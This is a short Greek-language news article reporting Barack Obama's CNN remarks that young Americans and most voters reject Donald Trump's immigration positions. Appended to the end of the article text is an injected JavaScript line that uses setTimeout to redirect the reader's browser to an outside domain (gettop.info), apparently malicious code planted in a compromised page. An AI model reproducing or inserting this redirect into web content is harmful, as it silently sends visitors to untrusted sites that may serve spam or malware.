Ομπάμα: Οι νέοι απορρίπτουν τις θέσεις του Τραμπ για τη μετανάστευση

0
3

 

Οι θέσεις του υποψήφιου των Ρεπουμπλικανών Ντόναλντ Τραμπ για τη μετανάστευση απορρίπτονται πλήρως από την αμερικανική νεολαία, αλλά και την πλειονότητα των Αμερικανών εκτίμησε ο πρόεδρος των ΗΠΑ Μπαράκ Ομπάμα, σημειώνοντας: «Υπάρχει (στις ΗΠΑ) μια μακρά παράδοση μετανάστευσης, ποικιλομορφίας. Αυτό δεν θα αλλάξει απλά και μόνο επειδή ο κ. Τραμπ συγκεντρώνει λίγη περισσότερη προσοχή από το συνηθισμένο».

Σε συνέντυξή του στο CNN, ο Ομπάμα επέμεινε στη θέση που έχει επαναλάβει πολλές φορές ότι είναι πεπεισμένος πως ο μεγιστάνας των ακινήτων δεν θα τον διαδεχθεί στον Λευκό Οίκο το 2017. «Αν δείτε τις δημοσκοπήσεις, έχει καταφέρει να προσελκύσει την προσοχή μιας συγκεκριμένης ομάδας ανθρώπων (…) που έχει θεμιτές ανησυχίες για την οικονομία ή έχει το αίσθημα πως την παραμελούν. Αλλά αυτή δεν είναι η πλειοψηφία των Αμερικανών», συνέχισε ο πρόεδρος των ΗΠΑ.

«Κι αν μιλήσετε στους νέους, στην επόμενη γενιά Αμερικανών, απορρίπτουν εντελώς τον δρόμο» που προτείνει ο Τραμπ, πρόσθεσε ο Ομπάμα. «Πρέπει να επιδεικνύουμε προσοχή σε αυτό που συμβαίνει (…) κάθε φορά που κάνει την επανεμφάνισή της η μισαλλοδοξία, αλλά συνολικά, είμαι αισιόδοξος». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here